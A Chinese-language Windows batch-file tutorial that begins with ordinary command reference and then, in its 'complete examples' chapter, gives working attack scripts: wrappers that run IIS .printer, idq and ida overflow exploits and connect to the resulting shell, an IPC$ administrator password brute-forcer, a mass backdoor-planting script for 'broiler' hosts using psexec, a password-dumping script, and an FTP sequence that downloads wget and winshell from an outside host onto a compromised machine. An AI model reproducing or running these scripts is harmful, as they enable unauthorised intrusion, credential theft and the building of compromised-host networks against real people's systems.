bat關鍵字:echo、@、call、rem、pause
echo:顯示此命令後的語句
echo off:表示在此語句後所有命令都不顯示命令行本身
@與echo off想像,但是加載其他命令行的最前面
call:調用另一條批處理文件(如果直接調用別的批處理文件 ,執行完那條檔後將無法執行當前檔後續命令)
pause:運行此句會暫停,等待用戶按任意鍵繼續
rem:表示此命令後的字符爲解釋行,不執行
第一章 批處理的專用命令
批處理文件是將一系列命令按一定的順序集合爲一個可執行的文本文件,其擴展名爲BAT,這些命令統稱批處理命令。
一.REM
註釋命令一般是用來給程序加上註解的,該命令後的內容在程序執行的時候將不會被顯示和執行。
二.ECHO
ECHO 是一個回顯命令,主要參數有OFF和 ON,一般用ECHO message來顯示一個特定的消息。
三.GOTO
在批處理中允許以“:XXX”來構建一個標號,然後用“GOTO :標號”直接來執行標號後的命令。
eg:
:LABEL
REM 上面就是名爲LABEL的標號。
DIR C:
DIR D:
GOTO LABEL
REM 以上程序跳轉標號LABEL處繼續執行。
四.CALL
在批處理執行過程中調用另一個批處理,當另一個批處理執行完後再繼續執行原來的批處理。
語法:
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
參數:
[Drive:}[Path] FileName
指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat 或 .cmd 擴展名。
eg:
批處理2.BAT內容如下:
ECHO 這就是2的內容
批處理1.BAT內容如下:
ECHO 這是1的內容
CALL 2.BAT
ECHO 1和2的內容全部顯示完成
執行結果如下:
C:>1.BAT
這是1的內容
這就是2的內容
1和2的內容全部顯示完成
五.PAUSE
PAUSE 停止系統命令的執行並顯示下面的內容。
六.START
調用外部程序,所有的DOS命令和命令行程序都可以由start命令來調用。
入侵常用參數:
MIN 開始時窗口最小化
SEPARATE 在分開的空間內開始 16 位 Windows 程序
HIGH 在 HIGH 優先級類別開始應用程序
REALTIME 在 REALTIME 優先級類別開始應用程序
WAIT 啓動應用程序並等候它結束
parameters 這些爲傳送到命令/程序的參數
執行的應用程序是 32-位 GUI 應用程序時,CMD.EXE 不等應用程序終止就返回命令提示。如果在命令腳本內執行,該新行爲則不會發生。
七.CHOICE
choice 使用此命令可以讓用戶輸入一個字符,從而運行不同的命令。使用時應該加/c:參數,c:後應寫提示可輸入的字符,之間無空格。它的返回碼爲1234……
eg:
choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的內容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (應先判斷數值最高的錯誤碼)
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
八.IF
if 表示將判斷是否符合規定的條件,從而決定執行不同的命令。 有三種格式:
1、if “參數” == “字符串” 待執行的命令
參數如果等於指定的字符串,則條件成立,運行命令,否則運行下一句。(注意是兩個等號)
如if "%1"“a” format a:
if {%1}{} goto noparms
if {%2}=={} goto noparms
2、if exist 文件名 待執行的命令
如果有指定的檔,則條件成立,運行命令,否則運行下一句。
如if exist config.sys edit config.sys
3、if errorlevel / if not errorlevel 數字 待執行的命令
如果返回碼等於指定的數字,則條件成立,運行命令,否則運行下一句。
如if errorlevel 2 goto x2
DOS程序運行時都會返回一個數字給DOS,稱爲錯誤碼errorlevel或稱返回碼,常見的返回碼爲0、1。
條件判斷語句,語法格式如下:
IF [NOT] ERRORLEVEL number command
IF [NOT] string1string2 command
IF [NOT] EXIST filename command
說明:
[NOT] 將返回的結果取反值即“如果沒有”的意思。
ERRORLEVEL 是命令執行完成後返回的退出值
Number 退出值的數字取值範圍0~255。判斷時值的排列順序應該由大到小。返回的值大於或等於指定的值時條件成立。
string1string2 string1和string2都爲字符的數據,英文字符的大小寫將看做不同,這個條件中的等於號必須是2個(絕對相等),條件相等後即執行後面的 command
EXIST filename 爲文件或目錄存在的意思。
IF ERRORLEVEL這條語句必須放在某一個命令後面。執行命令後由IF ERRORLEVEL來判斷命令的返回值。
eg:
1、 IF [NOT] ERRORLEVEL number command
檢測命令執行完後的返回值做出判斷。
echo off
dir z:
rem 如果退出代碼爲1(不成功)就跳至標題1處執行
IF ERRORLEVEL 1 goto 1
rem 如果退出代碼爲0(成功)就跳至標題0處執行
IF ERRORLEVEL 0 goto 0
:0
echo 命令執行成功!
Rem 程序執行完畢跳至標題exit處退出
goto exit
:1
echo 命令執行失敗!
Rem 程序執行完畢跳至標題exit處退出
goto exit
:exit
Rem 這裏是程序的出口
2、 IF string1string2 command
檢測當前變量的值做出判斷
ECHO OFF
IF %12 goto no
Echo 變數相等!
Goto exit
:no
echo 變數不相等
goto exit
:exit
大家可以這樣看效果 C:>test.bat 數字
3、 IF [NOT] EXIST filename command
發現特定的文件做出判斷
echo off
IF not EXIST autoexec.bat goto 1
echo 文件存在成功!
goto exit
:1
echo 檔不存在失敗!
goto exit
:exit
九.FOR
是一個循環執行命令的命令,同時FOR的循環裏面還可以套用FOR在進行循環。
在批處理中FOR的命令如下:
FOR [%%c] IN (set) DO [command] [arguments]
在命令行中命令如下:
FOR [%c] IN (set) DO [command] [arguments]
常用參數:
/L 該集表示以增量形式從開始到結束的一個數字序列。因此,(1,1,5) 將產生序列 1 2 3 4 5,(5,-1,1) 將產生序列 (5 4 3 2 1)。
/D 如果集中包含通配符,則指定與目錄名匹配,而不與文件名匹配。
/F 從指定的文件中讀取數據作爲變量
eol=c - 指一個行註釋字符的結尾(就一個)
skip=n - 指在檔開始時忽略的行數。
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變量名稱的分配。m-n格式爲一個範圍。通過 nth 符號指定 mth。如果符號字符串中的最後一個字符星號,那麼額外的變量將在最後一個符號解析之後分配並接受行的保留文本。
usebackq - 指定新語法已在下類情況中使用:在作爲命令執行一個後引號的字符串並且一個單引號字符爲文字字符串命令並允許在 filenameset中使用雙引號擴起文件名稱。
下面來看一個例子:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k
會分析 myfile.txt 中的每一行,忽略以分號打頭的那些行,將每行中的第二個和第三個符號傳遞給 for 程序體;用逗號和/或空格定界符號。請注意,這個 for 程序體的語句引用 %i 來取得第二個符號,引用 %j 來取得第三個符號,引用 %k來取得第三個符號後的所有剩餘符號。對於帶有空格的文件名,您需要用雙引號將文件名括起來。爲了用這種方式來使用雙引號,您還需要使用 usebackq 選項,否則,雙引號會被理解成是用作定義某個要分析的字符串的。
%i 專門在 for 語句中得到說明,%j 和 %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號,只要不試圖說明一個高於字母 ‘z’ 或’Z’ 的變數。請記住,FOR 變量名分大小寫,是通用的;而且,同時不能有 52 個以上都在使用中。
您還可以在相鄰字符串上使用 FOR /F 分析邏輯;方法是,用單引號將括號之間的 filenameset 括起來。這樣,該字符串會被當作一個檔中的一個單一輸入行。最後,您可以用 FOR /F 命令來分析命令的輸出。方法是,將括號之間的 filenameset 變成一個反括字符串。該字符串會被當作命令行,傳遞到一個子 CMD.EXE,其輸出會被抓進內存,並被當作文件分析。
eg:
FOR /F “usebackq delims==” %i IN (set) DO @echo %i
會枚舉當前環境中的環境變量名稱。
刪除檔1.TXT 2.TXT 3.TXT 4.TXT 5.TXT
例:
ECHO OFF
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
或
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT
十.SETLOCAL
開始批處理文件中環境改動的本地化操作。在執行 SETLOCAL 之後所做的環境改動只限於批處理文件。要還原原先的設置,必須執行 ENDLOCAL。 達到批處理文件結尾時,對於該批處理文件的每個尚未執行的 SETLOCAL 命令,都會有一個隱含的 ENDLOCAL 被執行。
eg:
@ECHO OFF
SET PATH /*察看環境變量PATH
PAUSE
SETLOCAL
SET PATH=E:\TOOLS /*重新設置環境變量PATH
SET PATH
PAUSE
ENDLOCAL
SET PATH
從上例我們可以看到環境變量PATH第1次被顯示得時候是系統默認路徑。被設置成了E:\TOOLS後顯示爲E:\TOOLS但當ENDLOCAL後我們可以看到他又被還原成了系統的默認路徑。但這個設置只在該批處理運行的時候有作用。當批處理運行完成後環境變量PATH將會還原。
十一.SHIFT
讓在命令上的的命令使用超過10個(%0~%9)以上的可替代參數。
第二章 特殊的符號與批處理
一.@
關閉當前行的回顯。我們從上面知道用命令echo off可以關掉整個批處理的命令回顯但卻不能不顯示echo off這個命令。現在我們在這個命令前加上@這樣echo off這一命令就被@關閉了回顯從而達到所有命令均不回顯得要求
二.>
傳遞並覆蓋。他所起的作用是將運行後的回顯結果傳遞到後面的範圍(後面可是文件也可是默認的系統控制檯)
eg:
文件1.txt的檔內容爲:
1+1
使用命令c:>dir *.txt >1.txt
這時候1.txt的內容如下
驅動器 C 中的卷沒有標籤。
卷的序列號是 301A-1508
C:\ 的目錄
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 個文件 18,630,070 字節
0 個目錄 1,191,542,784 可用字節
三.>>
與符號>相似,但他們的區別在於>>是傳遞並在檔末尾追加>>也可將回顯傳遞給控制檯(用法同上),加在了原始的檔內容後面。
四.|
是一個管道傳輸命令意思是將上一命令執行的結果傳遞給下一命令去處理。
五.^
對特殊符號 > 、<、 &的前導字符。在命令中他將以上的3個符號的特殊功能去掉僅僅只吧他們當成符號而不使用他們的特殊意義。
六.&
允許在一行中使用2個以上不同的命令,當第一個命令執行失敗將不影響第2個命令的執行。
eg:
c:> dir z:\ &dir y:\ &dir c:\
七.&&
是允許在一行中使用2個以上不同的命令,當第一個命令執行失敗後後續的命令將不會再被執行。
eg:
c:> dir z:\ &&dir y:\ &&dir c:\
八.“”
允許在字符串中包含空格.
eg:
c:>cd “Program Files”
c:>cd progra~1
c:>cd pro*
以上方法都可以進入Program Files目錄
九.,
相當於空格。在某些特殊的情況下可以用,來代替空格使用。
十.;
當命令相同的時候可以將不同的目標用;隔離開來但執行效果不變。如執行過程中發生錯誤則只返回錯誤報告但程序還是會繼續執行。
eg:
DIR C:;D:;E:\F:\
第三章 批處理與變量
批處理每次能處理的變量從%0~%9共10個。其中%0默認給批處理的文件名使用。除非在使用SHIFT命令後%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一個%0。
系統區分變量的規則爲字符串中間的空格,即只要發現空格就把空格前面的字符當作一個變量而空格後面的字符則作爲另一個變量。
在系統中還有一種變量稱之爲環境變量(使用SET命令可以查看當前系統的環境變量)如當前系統目錄是%windir%或%SystemRoot%等。當同時使用的參數超過10個的時候,我們可以把某些在後面的程序中還要調用的變量保存爲環境變量。具體用法如 SET A=%1 這樣我們就命名了一個新的環境變量A 在調用變量A的時候要%A%這樣調用,環境變量不受SHIFT命令影響。如果要改變一個環境變量需要重新對其設置才能改變。當然也可以進行變量與變量之間的傳遞來達到目的。
eg:
ECHO OFF
SET PASS=%1
SHIFT
SET PASS1=%1
SHIFT
ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %PASS% %PASS1% %9
SET PASS=%PASS1% 變數的傳遞
SET PASS1=%9
SHIFT
ECHO %PASS% %PASS1% %9
使用命令:C:>TEST A B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 K 注意:這一行顯示了11個變量
A B L 在使用了3次SHIFT之後%9變成了L
B L 變量的傳遞後的結果
第四章 完整案例
例一
這個例子是利用iis5hack.exe對有.printer漏洞的主機進行溢出的批處理。用到的程序有iis5hack.exe和系統自帶的telnet.exe。iis5hack的命令格式爲:
iis5hack <目標ip> <目標端口> <目標版本> <溢出連接端口>目標版本爲0-9這10個數字分別對應不同語言版本和sp的系統版本,我們編制的批處理使用的命令格式爲 開始版本號可有可無。程序如下。
@echo off /*關閉命令回顯
if “%1%”"" goto help /*判斷%1是否爲空,%1爲目標ip
if “%2%”“1” goto 1 /判斷%2是否爲1,爲1則跳轉標誌1
if “%2%”==“2” goto 2 /%2爲開始版本號,如果沒有設置則
if “%2%”“3” goto 3 /*如果存在則從匹配的地方開始執行
if “%2%”“4” goto 4
if “%2%”“5” goto 5
if “%2%”“6” goto 6
if “%2%”“7” goto 7
if “%2%”“8” goto 8
if not EXIST iis5hack.exe goto file /*沒有發現iis5hack.exe就執行標誌file段內容
ping %1 -n 1 | find “Received = 1” /*ping目標1次,從結果中發現Received = 1
if errorlevel 1 goto error /*如果返回代碼爲1則執行error段(代碼1爲沒有發現 0爲發現併成功執行)
iis5hack %1 80 9 88 | find “good” /*開始溢出目標端口80 系統代碼9 溢出後連接埠88 在執行結果中發現字符串”good”(溢出成功後纔會有字符串good)
if not errorlevel 1 goto telnet /*如果沒有錯誤代碼1(溢出成功)就執行telnet段的內容。
echo 操作系統類型 9 失敗! /否則顯示這一句
:8 /*以下代碼內容參照上面
iis5hack %1 80 8 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 8 失敗!
:7
iis5hack %1 80 7 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 7 失敗!
:6
iis5hack %1 80 6 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 6 失敗!
:5
iis5hack %1 80 5 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 5 失敗!
:4
iis5hack %1 80 4 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 4 失敗!
:3
iis5hack %1 80 3 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 3 失敗!
:2
iis5hack %1 80 2 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 2 失敗!
:1
iis5hack %1 80 1 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 1 失敗!
:0
iis5hack %1 80 0 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統類型 0 失敗!
goto error
:telnet
telnet %1 88 /*開始連接目標ip的88端口
goto exit /*連接中斷後跳轉exit段
:error /*error段顯示錯誤後的幫助信息
echo 可能網絡不能連接或者對方以修補該漏洞!請按照下面的格式手工嘗試一次!
echo iis5hack [目標IP] [WEB端口] [系統類型] [開放埠]
ECHO 中文: 0
ECHO 中文+sp1: 1
ECHO 英文: 2
ECHO 英文+sp1: 3
ECHO 日語: 4
ECHO 日語+sp1: 5
ECHO 韓文: 6
ECHO 韓文+sp1: 7
ECHO 墨西哥語: 8
ECHO 墨西哥語+sp1: 9
goto exit /*跳轉exit段
:file /*file段顯示文件沒有發現的信息
echo 文件iis5hack.exe沒有發現!程序終止運行!
goto exit /*跳轉exit段
:help /*help段顯示本批處理的使用格式幫助
echo 本程序用法如下:
echo iis [目標ip]
echo iis [目標ip] [開始的號碼9-0]
:exit /*exit段爲程序出口
這個批處理基本沒有什麼循環只是一路走下來。所以代碼比較長難度不大!
例二
這個例子是用iisidq.exe對有idq漏洞的機器進行溢出的批處理。使用的程序有iisidq.exe和系統自帶的程序telnet.exe。iisidq.exe的用法如下:
運行參數: 操作系統類型 目的地址 web埠 1 溢出監聽埠 <輸入命令1>
其中,如果輸入命令參數沒有輸入,那麼,默認爲:“cmd.exe”。
其中操作系統類型類型的代碼範圍是0-14。我們編制的批處理使用的命令格式爲 程序如下:
@echo off /*同例一
if not EXIST iisidq.exe goto file /*同例一
if %1 == “” goto error /*同例一
ping %1 -n 1 | find “Received = 1” /*同例一
if errorlevel 1 goto error1 /*同例一
set b=%1 /*創建一個環境變量b,將變量%1的內容傳遞給環境變量b。變量b的內容以後將是目標ip
set a=0 /*創建一個環境變量a並指定環境變量a爲0。由於使用整個批處理的循環所以用a來做計數器。
:no /*no段開始
if %a%==0 set d=0 /*如果環境變量a=0則創建環境變量d設定環境變量d=0。
if %a%==1 set d=1 /*環境變量d其實是操作系統類型代碼,用計數器來控制其
if %a%==2 set d=2 /*變動。
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
goto 0 /*變量傳遞完成後轉到標誌0處運行
:1
echo 正在執行第%d%項!與目標%b%不能連接!正在嘗試連接請等候…
:0 /*標誌0開始
IISIDQ %d% %b% 80 1 99 |find “good” /*按格式發送溢出命令並在結果中發現字符串good(發送代碼成功纔會有字符串good)
if errorlevel 1 goto 1 /*如果沒有good字符串則沒有發送成跳
/*轉標誌1處繼續嘗試發送
ping 127.0.0.1 -n 8 >nul /*ping自己8次相當於延時8秒不顯示執
/*行結果
echo 正在執行第%d%項! /*報告正在溢出的操作系統類型
telnet %b% 99 /*連接溢出埠
echo. /*顯示一個空行
if %d%==14 goto error1 /*如果操作系統類型爲14則跳轉error1處(循環出口)
if %d%==13 set a=11 /*開始用計數器對操作系統代碼重新附值
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
goto no /*附值完成跳轉no段執行
:file /*以下都是出錯後的幫助提示
echo IIsidq.exe沒有發現!將該文件和本文件放在同一目錄!
goto exit
:error
echo 錯誤!目標ip不可識別!請使用下面的格式連接!
echo idq [目標IP]
goto exit
:error1
echo 連接沒有成功!可能目標機器已經修補了該漏洞或者網絡故障所至!
echo 請按照下面的格式手工嘗試!
echo iisidq [目標類型] [目標IP] [目標端口] [連接方式] [溢出埠]
echo telnet [目標ip] [溢出埠]
:exit /*整個程序的出口
這個批處理採用的整體循環掌握好計數器部分就掌握了這個批處理。
例三
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f “tokens=1,2*” %%e in (userpass.txt) do net use \%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
上面的命令爲1條命令。大家可以看出該命令使用了4個FOR來套用的。用法爲:C:>TEST.BAT 218 當輸入218回車後該命令會由第1個for取初始值0爲%%a然後繼續取第2個for的初始值0爲%%b繼續取第3個for的初始值1爲%%c最後一個for是將userpass.txt中的第一段字符作爲密碼%%e第二段字符作爲用戶名%%f最後執行命令 (這裏我把上面的值都帶進去,設密碼爲123 用戶名爲 abc)
net usr \218.0.0.1\ipc$ 123 /u:abc
sample2:
利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。
我們用net use \ip\ipc$ “password” /u:"administrator"來嘗試這和目標主機進行連接,當成功時記下密碼。
最主要的命令是一條:for /f i% in (dict.txt) do net use \ip\ipc$ “i%” /u:“administrator”
用i%來表示admin的密碼,在dict.txt中這個取i%的值用net use 命令來連接。然後將程序運行結果傳遞給find命令--
for /f i%% in (dict.txt) do net use \ip\ipc$ “i%%” /u:“administrator”|find “:命令成功完成”>>D:\ok.txt ,這樣就ko了。
sample3:
你有沒有過手裏有大量肉雞等着你去種後門+木馬呢?,當數量特別多的時候,原本很開心的一件事都會變得很鬱悶:)。文章開頭就談到使用批處理文件,可以簡化日常或重複性任務。那麼如何實現呢?呵呵,看下去你就會明白了。
主要命令也只有一條:(在批處理文件中使用 FOR 命令時,指定變量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1,在這裏它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。
而cultivate.bat無非就是用net use命令來建立IPC$連接,並copy木馬+後門到victim,然後用返回碼(If errorlever =)來篩選成功種植後門的主機,並echo出來,或者echo到指定的檔。
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這裏你也一定明白這victim.txt裏的內容是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列,一般就是 ip password username。
代碼雛形:-+
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------
@echo off
@if “%1”=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------
@net use \%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@p***ec \%1 c:\winnt\system32\windrv32.exe
@p***ec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) -------------------
這只是一個自動種植後門批處理的雛形,兩個批處理和後門程序(Windrv32.exe),PSexec.exe需放在統一目錄下.批處理內容
尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.
- 簡單批處理文件概念
######################################################################
echo This is test > a.txt
type a.txt
echo This is test 11111 >> a.txt
type a.txt
echo This is test 22222 > a.txt
type a.txt
第二個echo是追加
第三個echo將清空a.txt 重新創建 a.txt
netstat -n | find “3389”
這個將要列出所有連接3389的用戶的ip.
test.bat___________________________________
@echo please care
echo plese care 1111
echo plese care 2222
echo plese care 3333
@echo please care
@echo plese care 1111
@echo plese care 2222
@echo plese care 3333
rem 不顯示註釋語句,本行顯示
@rem 不顯示註釋語句,本行不顯示
@if exist %windir%system32find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)
@if exist %windir%system32fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)
下面我們以具體的一個idahack程序就是ida遠程溢出爲例子.應該是很簡單的.
ida.bat______________________________
@rem ver 1.0
@if NOT exist %windir%system32idahack.exe echo “ERROR: dont find idahack.exe”
@if NOT exist %windir%system32nc.exe echo “ERROR: dont find nc.exe”
@if “%1” =="" goto USAGE
@if NOT “%2” =="" goto SP2
:start
@echo Now start …
@ping %1
@echo chinese win2k:1 sp1:2 sp2:3
idahack.exe %1 80 1 99 >%temp%_tmp
@echo “prog exit code [%errorlevel%] idahack.exe”
@type %temp%_tmp
@find “good luck 😃” %temp%_tmp
@echo “prog exit code [%errorlevel%] find [goog luck]”
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:SP2
@idahack.exe %1 80 %2 99 %temp%_tmp
@type %temp%_tmp
@find “good luck 😃” %temp%_tmp
@if NOT errorlevel 1 nc.exe %1 99
@goto END
:USAGE
@echo Example: ida.bat IP
@echo Example: ida.bat IP (2,3)
:END
ida.bat__END____________
下面我們再來第二個文件.就是得到administrator的口令.
大多數人說得不到.其實是自己的沒有輸入正確的信息.
fpass.bat_________________
@rem ver 1.0
@if NOT exist %windir%system32findpass.exe echo “ERROR: dont find findpass.exe”
@if NOT exist %windir%system32pulist.exe echo “ERROR: dont find pulist.exe”
@echo start…
@echo ____________________________________
@if “%1”=="" goto USAGE
@findpass.exe %1 %2 %3 >> %temp%_findpass.txt
@echo “prog exit code [%errorlevel%] findpass.exe”
@type %temp%_findpass.txt
@echo ________________________________Here__pass★★★★★★★★
@ipconfig /all >>%temp%_findpass.txt
@goto END
:USAGE
@pulist.exe >%temp%_pass.txt
@findstr.exe /i “WINLOGON explorer internat” %temp%_pass.txt
@echo “Example: fpass.bat %1 %2 %3 %4 !!!”
@echo “Usage: findpass.exe DomainName UserName PID-of-WinLogon”
:END
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "
@echo " fpass.bat end [%errorlevel%] !"
fpass.bat___END_______________________
還有一個就是已經通過telnet登陸了一個遠程主機.怎樣上傳文件(win)
依次在窗口輸入下面的東西. 當然了也可以全部拷貝.Ctrl+V過去. 然後就等待吧!!
echo open 210.64.x.4 3396>w
echo read>>w
echo read>>w
echo cd winnt>>w
echo binary>>w
echo pwd >>w
echo get wget.exe >>w
echo get winshell.exe >>w
echo get any.exe >>w
echo quit >>w
ftp -s:w